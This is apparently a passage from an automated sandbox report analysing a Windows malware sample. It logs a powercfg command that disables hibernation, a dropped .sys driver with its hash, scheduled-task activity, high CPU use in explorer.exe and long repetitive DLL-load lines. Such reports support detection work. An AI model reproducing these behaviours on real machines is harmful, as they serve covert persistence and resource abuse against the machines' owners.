              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeFile created: C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sysJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: fgfdgd.exe.6.drStatic PE information: No import functions for PE file found
              Source: ft1i6jvAdD.exeStatic PE information: No import functions for PE file found
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: dlnashext.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wpdshext.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: onecorecommonproxystub.dll
